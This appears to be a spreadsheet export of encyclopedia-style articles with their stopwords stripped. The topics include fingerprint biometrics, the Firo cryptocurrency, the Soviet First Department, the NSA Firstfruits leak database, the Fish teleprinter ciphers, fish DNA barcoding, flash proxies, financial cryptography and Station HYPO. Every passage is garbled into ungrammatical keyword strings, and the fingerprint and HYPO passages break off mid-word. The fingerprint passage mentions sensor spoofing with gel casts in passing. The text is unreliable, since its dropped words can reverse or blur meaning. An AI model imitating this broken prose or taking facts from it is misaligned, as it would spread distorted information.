repository biometric identifiers u.s. government million individual identities. when deployed 2004, repository, known automated biometric identification system (ident), stored biometric data form two-finger records. between 2005 2009, transitioned ten-print record standard order establish interoperability iafis. 1910, edmond locard established first forensic france. criminals wear gloves avoid leaving fingerprints. however, gloves leave prints unique human fingerprints. after collecting glove prints, enforcement match gloves collected evidence prints collected crime scenes. many jurisdictions wearing gloves committing crime prosecuted inchoate offense. fingerprints schools non-governmental organization (ngo) privacy international 2002 made cautionary announcement tens thousands school children fingerprinted schools, often without knowledge consent parents. that year, supplier micro librarian systems, uses technology similar used prisons german military, estimated schools throughout britain using systems replace library cards. 2007, estimated 3,500 schools using systems. under united kingdom data protection act, schools parental consent allow practices take place. parents opposed fingerprinting bring individual complaints schools. response complaint continuing pursue, 2010 european commission expressed 'significant concerns' proportionality necessity practice lack judicial redress, indicating practice break european union data protection directive.in march 2007, government considering fingerprinting children aged adding prints government database part passport card scheme disallowing opposition privacy concerns. fingerprints taken would cross-checked prints 900,000 unsolved crimes. shadow home secretary david davis called plan "sinister". liberal democrat home affairs spokesman nick clegg criticised "the determination build surveillance state behind backs british people". uk's junior education minister lord adonis defended fingerprints schools, track school attendance well access school meals libraries, reassured house lords children's fingerprints taken consent parents would destroyed children left school. early motion called government conduct full open consultation stakeholders biometrics schools, secured support members parliament (early motion 686). following establishment united kingdom conservative liberal democratic coalition government 2010, card scheme scrapped.serious concerns security implications using conventional biometric templates schools raised number leading security experts, voiced opinion absolutely premature begin using 'conventional biometrics' schools". vendors biometric systems claim products bring benefits schools improved reading skills, decreased wait times lunch lines increased revenues. they cite independent research support view. education specialist wrote 2007: able find single piece published research suggests biometrics schools promotes healthy eating improves reading skills amongst children... there absolutely evidence claims".the ottawa police canada advised parents fear children kidnapped fingerprint children. absence mutilation fingerprints rare medical condition, adermatoglyphia, characterized absence fingerprints. affected persons completely smooth fingertips, palms, toes soles, medical signs symptoms. 2011 study indicated adermatoglyphia caused improper expression protein smarcad1. condition called immigration delay disease researchers describing congenital lack fingerprints causes delays affected persons attempt prove identity traveling. only five families condition described 2011.people naegeli–franceschetti–jadassohn syndrome dermatopathia pigmentosa reticularis, forms ectodermal dysplasia, also fingerprints. both rare genetic syndromes produce signs symptoms well, thin, brittle hair. anti-cancer medication capecitabine cause loss fingerprints. swelling fingers, caused stings, cases cause temporary disappearance fingerprints, though return swelling recedes. since elasticity skin decreases age, many senior citizens fingerprints difficult capture. ridges thicker; height ridge bottom furrow gets narrow, less prominence.fingerprints erased permanently potentially used criminals reduce chance conviction. erasure achieved variety ways including simply burning fingertips, using acids advanced techniques plastic surgery. john dillinger burned fingers acid, prints taken previous arrest upon death still exhibited almost complete relation another. fingerprint verification fingerprints captured graphical ridge valley patterns. because uniqueness permanence, fingerprints emerged widely used biometric identifier 2000s. automated fingerprint verification systems developed meet needs enforcement became widespread civilian applications. despite deployed widely, reliable automated fingerprint verification remained challenge extensively researched context pattern recognition image processing. uniqueness fingerprint established overall pattern ridges valleys, logical ridge discontinuities known minutiae. 2000s minutiae features considered discriminating reliable feature fingerprint. therefore, recognition minutiae features became common basis automated fingerprint verification. widely used minutiae features used automated fingerprint verification ridge ending ridge bifurcation. patterns three basic patterns fingerprint ridges arch, loop, whorl: arch: ridges enter side finger, rise center forming arc, exit side finger. loop: ridges enter side finger, form curve, exit side. whorl: ridges form circularly around central point finger.scientists found family members often share general fingerprint patterns, leading belief patterns inherited. minutiae features features fingerprint ridges, called minutiae, include: ridge ending: abrupt ridge bifurcation: single ridge dividing short independent ridge: ridge commences, travels short distance ends island dot: single small ridge inside short ridge ridge ending connected ridges lake ridge enclosure: single ridge bifurcates reunites shortly afterward continue single ridge spur: bifurcation short ridge branching longer ridge bridge crossover: short ridge runs parallel ridges delta: y-shaped ridge meeting core: circle ridge pattern fingerprint sensors fingerprint sensor electronic device used capture digital image fingerprint pattern. captured image called live scan. this live scan digitally processed create biometric template collection extracted features) stored used matching. many technologies used including optical, capacitive, thermal, piezoresistive, ultrasonic, piezoelectric, mems. optical scanners take visual image fingerprint using digital camera. capacitive cmos scanners capacitors thus electrical current form image fingerprint. ultrasound fingerprint scanners high frequency sound waves penetrate epidermal (outer) layer skin. thermal scanners sense temperature differences contact surface, fingerprint ridges valleys. consumer electronics login authentication since 2000 electronic fingerprint readers introduced consumer electronics security applications. fingerprint sensors could used login authentication identification computer users. however, less sophisticated sensors discovered vulnerable quite simple methods deception, fake fingerprints cast gels. 2006, fingerprint sensors gained popularity laptop market. built-in sensors laptops, thinkpads, vaio, pavilion elitebook laptops, others also double motion detectors document scrolling, like scroll wheel.two first smartphone manufacturers integrate fingerprint recognition phones motorola atrix 2011 apple iphone september 2013. month after, launched max, also included fingerprint recognition. april 2014, samsung released galaxy integrated fingerprint sensor home button.following release iphone model, group german hackers announced september 2013, bypassed apple's touch fingerprint sensor photographing fingerprint glass surface using captured image verification. spokesman group stated: hope finally puts rest illusions people fingerprint biometrics. plain stupid something can't change leave everywhere every security token." september 2015, apple included version fingerprint scanner iphone home button iphone touch fingerprint scanner optional could configured unlock screen mobile apps purchases. since december 2015, cheaper smartphones fingerprint recognition released, $100 fair. samsung introduced finger</t>
  </si>
  <si>
    <t>Firo (cryptocurrency)</t>
  </si>
  <si>
    <t>firo, formerly known zcoin, cryptocurrency aimed using cryptography provide better privacy users compared cryptocurrencies bitcoin. history zcoin creation late 2014, poramin insom, student masters security informatics johns hopkins university wrote paper implementing zerocoin protocol cryptocurrency matthew green faculty member. project create standalone cryptocurrency implementing zerocoin protocol named "moneta".on september 2016, zcoin, first cryptocurrency implement zerocoin protocol, launched poramin insom team. roger initial investor. 2017-2018 february 2017, malicious coding attack zerocoin protocol created 370,000 fake tokens perpetrators sold bitcoins ($440,000). zcoin team announced single-symbol error piece code "allowed attacker create zerocoin spend transactions without corresponding mint". unlike ethereum event, developers opted destroy coins attempt reverse happened newly generated ones.in september 2017, poramin exchange named "satang pro" convert thai baht zcoin directly.in april 2018, cryptographic flaw found zerocoin protocol allowed attackers steal, destroy, create zcoins. zcoin cryptocurrency team acknowledging flaw, stated high difficulty performing attacks probability giving economic benefit attacker.in june 2018, cookly, thailand based cooking classes culinary experiences platform raised series funding zcoin. company also planned zcoin technology facilitate transactions.in august 2018, boozeat, liquor delivery service malaysia accepted zcoin payment method.in september 2018, zcoin introduced dandelion protocol hides origin address sender without using onion router (tor) virtual private network (vpn).in november 2018, zcoin conducted world's first large-scale party elections thailand democrat party using blockchain instead relying election commission count votes. month, video named "rap against dictatorship" uploaded zcoin blockchain thailand government's threat arresting people involved video speaking government policies.in december 2018, zcoin implemented merkle tree proof, mining algorithm deters usage application-specific integrated circuit (asic) mining coins memory intensive miners. this allows ordinary users central processing unit (cpu) graphics card mining, enable egalitarianism coin mining. 2019-2020 february 2019, zcoin added wallet supported binance cryptocurrency exchange. month, zcoin partnered binance charity foundation raise funds "lunch children" program africa. charity used blockchain track verify progress funds donor receiver. april 2019, zcoin listed indonesian digital exchange koinx.on july 2019, zcoin formally departed zerocoin protocol adopting protocol called "sigma" prevents counterfeit privacy coins inflating coin supply. this achieved removing feature called "trusted setup" zerocoin protocol. august 2019, zcoin added african cryptocurrency exchange named ovex. december 2019, zcoin introduced decentralised crowdfunding decision making system fund ancillary tasks project. july 2020, using crowdfunding system, zcoin raised us$22,500 contributors fund first phase third-party audit lelantus protocol.in january 2020, zcoin implement receiver address privacy (rap) users share single permanent address public receive money without outsiders knowing transaction history address. 2020, zcoin announced founder rewards ceased, time increase development funding block reward, allocated block reward masternodes. besides, us$100,000 reserve fund protect price volatility. september 2020, zcoin completed first halving block rewards. month, zcoin added stakehound easy accessibility decentralized finance (defi) earning staking rewards. firo october 2020, zcoin announced rebranding name called "firo" signifies unique burn (destroy) redeem coins. firo suffered attack january 2021. june 2021, firo added nobi trading platform based indonesia. firo implemented receiver address privacy (rap) june 2021. august 2021, firo announced lelantus spark protocol. this protocol offers additional privacy features, including generating one-time addresses receiving payments, efficient multisignature operations, availability view keys authorised third parties view transaction. design zero-knowledge proofs firo initially implemented zerocoin protocol. unlike bitcoin, money travel block another. instead, traded zerocoin redeem coin without history transaction. however, disadvantage system transaction amount cannot hidden. there little research interest zerocoin protocol similarity zerocash protocol.there three phases lelantus transaction. since trusted setup needed, makes algorithm faster. first phase, block transaction history deleted, generating block previous history (minting). serial number added minted coin prevent double spending. second phase, previous minted coins parsed serial number published blockchain (spending). third phase, participants verify block without actual inputs. dandelion++ protocol firo implemented dandelion++ protocol 2018. protocol helps increase anonymity sender dissemination transaction. there phases dandelion protocol: stem phase fluff phase. stem phase, message forwarded single, randomly chosen neighbour. then, fluff phase, message broadcast neighbours except forwarder message. dandelion improved version dandelion protocol problem transactions lost defective malicious nodes avoided broadcasting message node receive message certain period time fluff phase. these steps shuffles addresses nodes help protect users' anonymity. receiver address privacy (rap) june 2021, firo introduced receiver address privacy (rap) addresses, adaptation bip47. allows users able publicly post wallet addresses without worry privacy. past, wallet users create share freshly generated addresses attempt maintain privacy. mining firo implemented algorithm december 2018. using video cards, mining firo profitable mining ethereum. nvidia geforce 3080 able churn mhash/s hash rate, earning us$5 dollars day. meanwhile, geforce 3080 able churn mhash/s cryptocurrency. algorithm changed firopow october 2021. regulatory responses february 2021, thailand securities exchange commission (sec) mooted idea banning privacy coins exchanges. poramin insom argued lacks rationale clarity cryptocurrencies including bitcoin privacy features besides, exchanges easily track customers' details using know-your-customer (kyc) anti-money laundering (aml) procedures. price volatility october 2018, firo ranked fully diluted market capitalisation us$194,506,940 dollars. firo all-time high price us$170 coin 2017–2018. february 2020, firo price dropped us$3 us$5 dollars coin. firo priced us$7.5 september 2021. analysis according researchers technical university denmark, sigma lelantus protocols contributed area specialised trustless zero-knowledge proofs seldom offered strong anonymity guarantees compared zk-snarks performance limitations. however, zk-snark-like proof complicated research simpler zero-knowledge protocols provide practical anonymous payments future. cryptographic audit done september 2020. according audit, lelantus protocol offers good privacy without trusted setup reasonable proving time within seconds anonymity size 216. according shibai al., lelantus described "promising" ensuring privacy anonymity cryptocurrency transactions. however, according master thesis written bontekoe, university twente, would prefer zk-snarks digital payments "the used primitives zcoin (lelantus) currently allow extensive statements likely require make scheme anonymous auditable."lelantus also implemented mimble wimble protocol produce protocol named oscausi. also legality bitcoin country references</t>
  </si>
  <si>
    <t>First Department</t>
  </si>
  <si>
    <t>first department (russian: первый отдел) charge secrecy political security workplace every enterprise institution soviet union dealt kind technical scientific information (plants, institutions, etc.) printing capabilities (e.g., publishing houses). every branch central statistical administration successor state statistics committee (goskomstat) also first department control access, distribution, publication official economic, population, social statistics. copies especially sensitive documents numbered labeled stamped secret "for official only". cases, "official use" version documents mimicked public versions format provided much detailed information.the first departments part subordinated management enterprise institution. among functions control access information considered state secret, foreign travel, publications. first department also kept account usage copying devices (xerographers, printing presses, typewriters, etc.) prevent unsanctioned copying, including samizdat. also censorship spetskhran references</t>
  </si>
  <si>
    <t>Firstfruits</t>
  </si>
  <si>
    <t>firstfruits united states counterintelligence program database tracks unauthorized disclosures intelligence material news media. project's goal reduce losses collection capability journalists. database created central intelligence agency, transferred national security agency. database thousands unofficial negative articles authors. maintenance program outsourced third parties like booz allen hamilton. program became known whistleblower edward snowden.joseph brand, senior national security agency (nsa) official, leading advocate crackdown leaks whistleblowers 2001 created department staffed "leak trackers." hired contractor build foreign knowledge database". program funded cia. name played phrase "the fruits labor".according brand, "adversaries know sigint sources methods today ever before,". brand noted disclosures came u.s. government's official communications; secrets acquired foreign spies. "most often disclosures occur media." brand listed four "flagrant media leakers" presentation: washington post, york times, yorker, washington times. journalist tracked database include bill gertz, seymour hersh, james bamford, james risen, vernon loeb, john daly, barton gellman.journalist database tracked intelligence agency regular reports going federal bureau investigation department justice possible prosecution. controversy according barton gellman, "brand's accounting like many government's public assertions left something desired: frequent accusation invoked debates whether journalists cause “impairment” u.s. government journalists’ fault u.s. lost access osama laden’s satellite-phone communications late 1990s. hard overstate centrality episode intelligence community’s lore news media. accusation, best ascertain, first made publicly 2002 then–white house press secretary fleischer. after newspaper reported could listen osama laden satellite phone, fleischer al‑qaeda leader abandoned device. president bush long line officials reprised assertion years come. tale busted satellite-phone surveillance almost certainly untrue. story question said nothing u.s. eavesdropping. published, united states launched barrages cruise missiles al‑qaeda training camps afghanistan factory sudan, including facility laden recently visited. after this, laden went deep underground, forswearing electronic communications might give location away. blaming news story development, rather close miss laden’s life, strained logic. somehow became article faith intelligence community. references</t>
  </si>
  <si>
    <t>Fish (cryptography)</t>
  </si>
  <si>
    <t>fish (sometimes fish) uk's gc&amp;cs bletchley park codename several german teleprinter stream ciphers used world enciphered teleprinter traffic used german high command army group commanders field, intelligence value (ultra) highest strategic value allies. this traffic normally passed landlines, german forces extended geographic reach beyond western europe, resort wireless transmission.bletchley park decrypts messages enciphered enigma machines revealed germans called wireless teleprinter transmission systems "sägefisch" (sawfish) british cryptographers refer encrypted german radiotelegraphic traffic fish. code tunny (tunafish) name given first non-morse link, subsequently used lorenz machines traffic enciphered them. history june 1941, british wireless intercept stations, well receiving enigma-enciphered morse code traffic, started receive non-morse traffic initially called nomo. nomo1 german army link berlin athens, nomo2 temporary force link berlin königsberg. parallel enigma-enciphered link nomo2, read government code cypher school bletchley park, revealed germans called wireless teleprinter transmission systems "sägefisch" (sawfish). this british code fish dubbing machine traffic tunny.the enciphering/deciphering equipment called geheimschreiber (secret writer) which, like enigma, used symmetrical substitution alphabet. teleprinter code used international telegraph alphabet (ita2)—murray's modification 5-bit baudot code. when germans invaded russia, world germans began type enciphered transmission central headquarters headquarters field. transmissions known fish bletchley park. (see lorenz cipher, cryptanalysis lorenz cipher.) german army used fish communications highest authorities berlin high-ranking officials german army field. fish traffic personnel bletchley park intercepted, contained discussions, orders, situation reports many details intentions german army. however, transmissions challenging decrypt even assistance high speed colossus computer, messages could read several days later. “vital intelligence obtained hitler’s intentions d-day 1944.” traffic code names tunny nomo1 link initially named tunny (for tunafish), name went used lorenz sz40/42 machines bletchley park analogues them. nomo1 link subsequently renamed codfish. large number tunny links monitored y-station knockholt given names fish. most oberkommando wehrmacht (german high command, okw) berlin german army commands throughout occupied europe. cryptanalysis lorenz cipher bletchley park, assisted initially machine called heath robinson later colossus computers yielded great deal valuable high-level intelligence. tunny decrypts provided high-grade intelligence unprecedented quality. walter jacobs, army codebreaker worked bletchley park, wrote official report operation break tunny march 1945 alone 'upward five million letters current transmission, containing intelligence highest order, deciphered'. sturgeon this name given traffic encoded siemens halske geheimschreiber. 1940, german invasion norway, swedish mathematician cryptographer arne beurling used traffic intercepted telegraph lines passed sweden break cipher. although bletchley park eventually diagnosed broke sturgeon, relatively value intelligence gained, compared effort involved, meant read much traffic. thrasher this name used traffic enciphered geheimschreiber probably siemens one-time tape machine. this used circuits, later stages diagnosed bletchley park, considered unbreakable. list senior involved staff bletchley park including executives cryptographers fish (tunny) testery. ralph tester linguist head testery w.t. tutte codebreaker mathematician john tiltman codebreaker intelligence officer newman mathematician codebreaker later newmanry jerry roberts shift-leader, linguist senior codebreaker peter ericsson shift-leader, linguist senior codebreaker victor masters shift-leader denis oswald linguist senior codebreaker peter hilton codebreaker mathematician peter benenson codebreaker peter edgerley codebreaker john christie codebreaker john thompson codebreaker jenkins codebreaker colvill general manager also alan turing colossus (computer) heath robinson (codebreaking machine) ticom turingery notes references bauer, friedrich (2006), origins fish cypher machines copeland 2006, 411–417 copeland, jack, (2006), colossus: secrets bletchley park's codebreaking computers, oxford: oxford university press, isbn 978-0-19-284055-4 deavours, cipher kruh, louis (october 1986), "appendix mechanics german telecipher machine", cryptologia, (4): 230–242, doi:10.1080/0161-118691861074 (reprinted cryptology: yesterday, today tomorrow, artech house, norwood, 1987) gannon, paul (2006), colossus: bletchley park's greatest secret, london: atlantic books, isbn 978-1-84354-331-2 lewin, ronald (1978), ultra goes war: secret story, classic military history, harmondsworth, england: penguin books (published 2001) mache, wolfgang (october 1986), "geheimschreiber", cryptologia, (4): 230–242, doi:10.1080/0161-118691861065 (reprinted cryptology: yesterday, today tomorrow, artech house, norwood, 1987) mache, wolfgang (april 1989), "the siemens cipher teletype history telecommunications", cryptologia, (2): 97–117, doi:10.1080/0161-118991863817 (reprinted selections cryptologia: history, people, technology, artech house, norwood, 1998) mckay, craig (2006), "german teleprinter traffic swedish wartime intelligence", copeland, jack (ed.), colossus: secrets bletchley park's codebreaking computers, oxford: oxford university press, isbn 978-0-19-284055-4 smith, michael (2006), "how began: bletchley park goes war", copeland, jack (ed.), colossus: secrets bletchley park's codebreaking computers, oxford: oxford university press, isbn 978-0-19-284055-4 weierud, frode (2006), "bletchley park's sturgeon—the fish that laid eggs", copeland, jack (ed.), colossus: secrets bletchley park's codebreaking computers, oxford: oxford university press, isbn 978-0-19-284055-4</t>
  </si>
  <si>
    <t>Fish DNA barcoding</t>
  </si>
  <si>
    <t>barcoding methods fish used identify groups fish based sequences within selected regions genome. these methods used study fish, genetic material, form environmental (edna) cells, freely diffused water. this allows researchers identify species present body water collecting water sample, extracting sample isolating sequences specific species interest. barcoding methods also used biomonitoring food safety validation, animal diet assessment, assessment food webs species distribution, detection invasive species.in fish research, barcoding used alternative traditional sampling methods. barcoding methods often provide information without damage studied animal.aquatic environments unique properties affect genetic material organisms distributed. material diffuses rapidly aquatic environments, makes possible detect organisms large area sampling specific spot. rapid degradation aquatic environments, detected species represent contemporary presence, without confounding signals past.dna-based identification fast, reliable accurate characterization across life stages species. reference libraries used connect barcode sequences single species used identify species present samples. libraries reference sequences also useful identifying species cases morphological ambiguity, larval stages.edna samples barcoding methods used water management, species composition used indicator ecosystem health. barcoding metabarcoding methods particularly useful studying endangered elusive fish, species detected without catching harming animals. applications ecological monitoring biomonitoring aquatic ecosystems required national international legislation (e.g. water framework directive marine strategy framework directive). traditional methods time-consuming include destructive practices harm individuals rare protected species. barcoding relatively cost-effective quick method identifying fish species aquatic environments. presence absence fish species established using edna water samples spatio-temporal distribution fish species (e.g. timing location spawning) studied. this help discover e.g. impacts physical barriers construction human disturbances. tools also used dietary studies fish construction aquatic food webs. metabarcoding fish contents feces identify recently consumed prey species. however, secondary predation must taken consideration. invasive species early detection vital control removal non-indigenous, ecologically harmful species (e.g. lion fish (pteroissp.) atlantic caribbean). metabarcoding edna used detect cryptic invasive species aquatic ecosystems. fisheries management barcoding metabarcoding approaches yield rigorous extensive data recruitment, ecology geographic ranges fisheries resources. methods also improve knowledge nursery areas spawning grounds, benefits fisheries management. traditional methods fishery assessment highly destructive, gillnet sampling trawling. molecular methods offers alternative non-invasive sampling. example, barcoding metabarcoding help identifying fish eggs species ensure reliable data stock assessment, proven reliable identification phenotypic characters. barcoding metabarcoding also powerful tools monitoring fisheries quotas by-catch.edna detect quantify abundance anadromous species well temporal distribution. this approach used develop appropriate management measures, particular importance commercial fisheries. food safety globalisation food supply chains increased uncertainty origin safety fish-based products. barcoding used validate labelling products trace origin. “fish fraud” discovered across globe. recent study supermarkets state york found 26.92% seafood purchases identifiable barcode mislabelled.barcoding also trace fish species human health hazards related consumption fish. further, biotoxins occasionally concentrated toxins move food chain. example relates coral reef species predatory fish barracuda detected cause ciguatera fish poisoning. such associations fish poisoning detected fish barcoding. protection endangered species barcoding used conservation endangered species prevention illegal trading cites listed species. there large black market fish based products also aquarium trades. protect sharks overexploitation, illegal detected barcoding shark soup traditional medicines. methodology sampling aquatic environments aquatic environments special attributes need considered sampling fish edna metabarcoding. seawater sampling particular interest assessment health marine ecosystems biodiversity. although dispersion edna seawater large salinity negatively influences preservation, water sample contain high amounts edna fish week sampling. free molecules, intestinal lining skin cell debris main sources fish edna.in comparison marine environments, ponds biological chemical properties alter edna detection. small size ponds compared water bodies makes sensitive environmental conditions exposure light changes temperature these factors affect amount edna. moreover, trees dense vegetation around ponds represent barrier prevents water aeration wind. such barriers also promote accumulation chemical substances damage edna integrity. heterogeneous distribution edna ponds affect detection fishes. availability fish edna also dependent life stage, activity, seasonality behavior. largest amounts edna obtained spawning, larval stages breeding activity. target regions primer design crucial metabarcoding success. some studies primer development described cytochrome suitable target regions fish metabarcoding. evans et.al. (2016) described ac16s l2513/h2714 primer sets able detect fish species accurately different mesocosms. another study performed valentini et.al. (2016) showed l1848/h1913 primer pair, amplifies region rrna locus, able reach high taxonomical coverage discrimination even short target fragment. this research also evidenced sampling sites, metabarcoding approach similar even higher traditional methods (e.g. electrofishing netting methods). hänfling et.al. (2016) performed metabarcoding experiments focused lake fish communities using 12s_f1/12s_r1 cytb_l14841/cytb_h15149 primer pairs, whose targets located mitochondrial cytochrome regions respectively. results demonstrate detection fish species higher using primers cytb. this persistence shorter fragments (~100 comparison larger cytb amplicon (~460 bp). general, studies summarize special considerations primer design selection taken according objectives nature experiment. fish reference databases there number open access databases available researchers worldwide. proper identification fish specimens barcoding methods relies heavily quality species coverage available sequence databases. fish reference database electronic database typically contains barcodes, images, geospatial coordinates examined fish specimens. database also contain linkages voucher specimens, information species distributions, nomenclature, authoritative taxonomic information, collateral natural history information literature citations. reference databases curated, meaning entries subjected expert assessment included, uncurated, case include large number reference sequences less reliable identification species. fish-bol launched 2005, fish barcode life initiative (fish-bol) www.fishbol.org international research collaboration assembling standardized reference sequence library fish species. concerted global research project goal collect assemble standardized barcode sequences associated voucher provenance data curated reference sequence library molecular identification fish species.if researchers wish contribute fish-bol reference library, clear guidelines provided specimen collection, imaging, preservation, archival, well meta-data collection submission protocols. fish-bol database functions portal barcode life data systems (bold). french polynesia fish barcoding base french polynesia fish barcoding database contains specimens captured several field trips organised participated criobe (centre island research environmental observatory) since 2006 archipelagos french polynesia. classified specimen, following information available: scientific name, picture, date, coordinate, depth method capture, size, cytochrome oxidase subunit (co1) sequence. database searched using name (genus species) using part sequence. aquagene collaborative product developed several german institutions, aquagene provides free access curated genetic information marine fish species. database allows species identification sequence comparisons. species characterized multiple gene sequences, presently including standard barcoding gene together cytb, myh6 (coming shortly) rhod, facilitating unambiguous species determination even closely related species high intraspecific diversity. genetic data complemented online additional data sampled specimen, digital images, voucher number geographic origin. additional resources other reference databases general, also useful barcoding fish barcode life datasystem genbank. advantages barcoding/metabarcoding provides quick usually reliable species identification, meaning morphological identification, i.e. taxonomic expertise, needed. metabarcoding also makes possible identify species organisms degraded part organism available. powerful tool detection rare and/or invasive species, detected despite abundance. traditional methods assess fish biodiversity, abundance density include gears like nets, electrofishing equipment, trawls, cages, fyke-nets gear show reliable results presence abundant species. contrary, rare native species, well newly established alien species, less likely detected traditional methods, leading incorrect absence/presence assumptions. barcoding/metabarcoding also cases non-invasive sampling method, provides opportunity analyze edna sampling living organisms.for fish parasites, metabarcoding allows detection cryptic microscopic parasites aquatic environments, difficult direct methods (e.g. identifying species samples microscopy). some parasites exhibit cryptic variation metabarcoding helpful method revealing this.the application edna metabarcoding cost-effective large surveys many samples required. edna reduce costs fishing, transport samples time invested taxonomists, cases requires small amounts target species reach reliable detection. constantly decreasing prices barcoding/metabarcoding technical development another advantage. edna approach also suitable monitoring inaccessible environments. challenges results obtained metabarcoding limited biased frequency occurrence. also problematic species barcodes attached them.even though metabarcoding overcome practical limitations conventional sampling methods, still consensus regarding experimental design bioinformatic criteria application edna metabarcoding. lack criteria heterogeneity experiments studies conducted far, dealt different fish diversities abundances, types aquatic ecosystems, numbers markers marker specificities.another significant challenge method quantify fish abundance molecular data. although cases quantification possible appears consensus how, extent, molecular data meet fish monitoring. also barcoding barcoding diet assessment algae barcoding microbial barcoding aquatic macroinvertebrate barcoding references</t>
  </si>
  <si>
    <t>Flash proxy</t>
  </si>
  <si>
    <t>flash proxy pluggable transport proxy runs browser. flash proxies internet censorship circumvention tool enables users connect anonymity network (amongst others) plethora ephemeral browser-based proxy relays. essential idea addresses contingently used changed faster censoring agency detect, track, block them. traffic wrapped websocket format disguised cipher. implementation free software implementation flash proxies available. uses javascript, websocket, python implementation obfsproxy protocol, crafted security project computer security stanford university. this work supported defense advanced research project agency (darpa) space naval warfare systems center pacific contract n66001-11-c-4022. also crypto-anarchism cryptocat cryptoparty freedom information internet censorship internet privacy proxy server references external links primary developer gives overview stanford university</t>
  </si>
  <si>
    <t>Financial cryptography</t>
  </si>
  <si>
    <t>financial cryptography cryptography applications financial loss could result subversion message system. financial cryptography distinguished traditional cryptography recorded history, cryptography used almost entirely military diplomatic purposes. financial cryptography includes mechanisms algorithms necessary protection financial transfers, addition creation forms money. proof work various auction protocols fall umbrella financial cryptography. hashcash used limit spam. financial cryptography seen broad scope application. grigg sees financial cryptography seven layers, combination seven distinct disciplines: cryptography, software engineering, rights, accounting, governance, value, financial applications. business failures often traced absence disciplines, poor application them. this views financial cryptography appropriately cross-discipline subject. indeed, inevitably given finance cryptography built upon multiple disciplines. history cryptographers think field originated work david chaum invented blind signature. blind signature special form cryptographic signature allowed virtual coins signed without signer seeing actual coin. permitted form digital token money prevented traceability. this form sometimes known digital currency. similar concepts applied modern blockchain technologies. system widely used 1970s-1990s previously developed cryptographic mechanism data encryption standard, used primarily protection electronic funds transfers. however, work david chaum excited cryptography community potential encrypted messages actual financial instruments. part business model, financial cryptography followed guide cryptography simplest ideas adopted. account money systems protected paypal e-gold relatively successful. 2001, paypal processed $3.1 billion payments, averaging 189,000 transactions daily totaling $9.6 million.but innovative mechanisms, including blinded token money, struggled gain traction. david chaum's digicash, opened 1989, filed bankruptcy protection november 1998. competitive rivals also failed remain viable. first virtual holdings abandoned business august 1998. cybercash ceased "cybercoin" early 1999. associations financial cryptography extent organized around annual meeting international financial cryptography association, held year different location. also automated teller machines (atm) bitcoin blockchain cryptoeconomics digital currency monero (cryptocurrency) point-of-sale (pos) hardware security modules (hsm) payment system smart contracts economics security bilateral exchange references external links international financial cryptography association</t>
  </si>
  <si>
    <t>Station HYPO</t>
  </si>
  <si>
    <t>station hypo, also known fleet radio unit pacific (frupac) united states navy signals monitoring cryptographic intelligence unit hawaii world major allied signals intelligence units, called fleet radio units pacific theaters, along frumel melbourne, australia. station took initial name phonetic code time heʻeia, hawaii radio tower. precise importance role hypo penetrating japanese naval codes subject considerable controversy, reflecting internal tensions amongst navy cryptographic stations. hypo control op-20-g naval intelligence section washington. before attack pearl harbor december 1941, time afterwards, hypo basement administration building pearl harbor. later building constructed station, though reorganized renamed then. background cryptanalytic problems facing united states pacific prior world largely related japan. early decision op-20-g washington divided responsibilities among cast cavite corregidor, philippines, hypo hawaii, op-20-g washington. other navy crypto stations, including guam bainbridge island puget sound tasked staffed signals interception traffic analysis. army's broke highest level japanese diplomatic cypher (called purple well attack pearl harbor. purple produced little military value, japanese foreign ministry thought ultra-nationalists unreliable. furthermore, decrypts purple, eventually called magic, poorly distributed used washington. able build several purple machine equivalents. sent cast, hypo's assigned responsibility include purple traffic, purple machine ever sent there. absence machine site hawaii long seen conspiracy theorists reason unpreparedness hawaii, and/or evidence conspiracy high level officials deprive pearl harbor intelligence known washington. however, hard evidence conspiracy exists. japanese naval signals 1941 early 1942 hypo assigned responsibility work japanese navy systems, agreement australia, united kingdom netherlands share effort, worked crypto groups based melbourne, hong kong batavia. prior attack pearl harbor, amount available traffic low, little progress made important japanese navy system, called jn-25 u.s. analysts. jn-25 used high level operations: movement planning commands, instance. state-of-the-art superencrypted code, eventually two-book system. cryptanalytic progress slow. most references cite messages partially sometimes completely) decrypted prior december 1941, time version system went effect, requiring cryptanalysts start again. although references limit percent messages decrypted 10%, privy latest information. wilford decoding pearl harbor: cryptanalysis challenge jn-25b 1941, suggests view untenable jn-25 codes readable great extent hence, lends "support revisionist theories toland stinnett." after attack pearl harbor, considerably jn-25 traffic japanese navy operational tempo increased geographically expanded, helped progress hong kong's contribution stopped crypto station could relocated ceylon eventually kenya), hypo dutch batavia, conjunction cast op-20-g made steady progress. hypo particular made significant contributions. people, including commander, joseph rochefort, thought forthcoming japanese attack early 1942 intended central pacific, opinion op-20-g, backed cast, favored north pacific, perhaps aleutians. early 1942, response japanese advances philippines (which threatened cast), possibility invasion hawaii, increasing demand intelligence, another signals intelligence center, known negat formed washington, using elements op-20-g. words historian frederick parker: middle march 1942, viable naval radio intelligence centers existed pacific—one melbourne, australia [frumel], one, hypo, pearl harbor, hawaii center corregidor (cast) longer affiliated fleet command, collection processing capabilities rapidly disintegrating result evacuations personnel australia destruction facilities bombing gunfire. japanese traffic intercepted regarding offensive operation planned target identified lcdr wilfred holmes hypo responsible ruse identified false report fresh water shortage midway radioed clear, evoking encrypted japanese response noting reporting water troubles; midway.as mid-1942 approached, hypo high pressure, tales 36-hour stints, rochefort working bathrobe appearing briefings late disheveled besides. this effort climaxed last week decryption enough jn-25 traffic understand japanese attack plan midway some, complete detail. this allowed admiral nimitz gamble ambush resulted battle midway, loss four japanese carriers many naval aviators much lower allied losses, generally agreed turning point pacific war. post-midway transfers changes october 1942 midway, power struggles within navy resulted sidelining laurance safford, support admirals ernest king richmond turner (and joseph redman). control naval intercept codebreaking centralizing op-20-g washington, sections headed john redman (communications combat intelligence section) joseph wenger (communications cryptanalytical section; handle decryption translation). safford shifted administrative support cryptographic research role; sidelined remainder (doing crypto work); joseph rochefort hawaii assigned command dry-dock west coast).after midway, rochefort recommended distinguished service medal admiral ernest king. however, personal enmity chief staff prior passing encounter, non-support immediate supervisors, king deny award. nimitz, learned rochefort's treatment years later, quite displeased. rochefort posthumously awarded medal campaign intelligence officers galvanized admiral "mac" showers eventually head william casey rectify oversight.having commandeered girls' school washington (the army took too), naval intelligence op-20-g expanded greatly. hypo became smaller proportion total navy signals intelligence effort pacific. references bibliography holmes, (1979). double-edged secrets: u.s. naval intelligence operations pacific during world annapolis, maryland: blue jacket books/naval institute press. isbn 1-55750-324-9. layton, edwin (1985). there: pearl harbour midway breaking secrets. york: william morrow. isbn 0-688-04883-8. parker, frederick "part one: battle coral sea". priceless advantage: u.s. navy communications 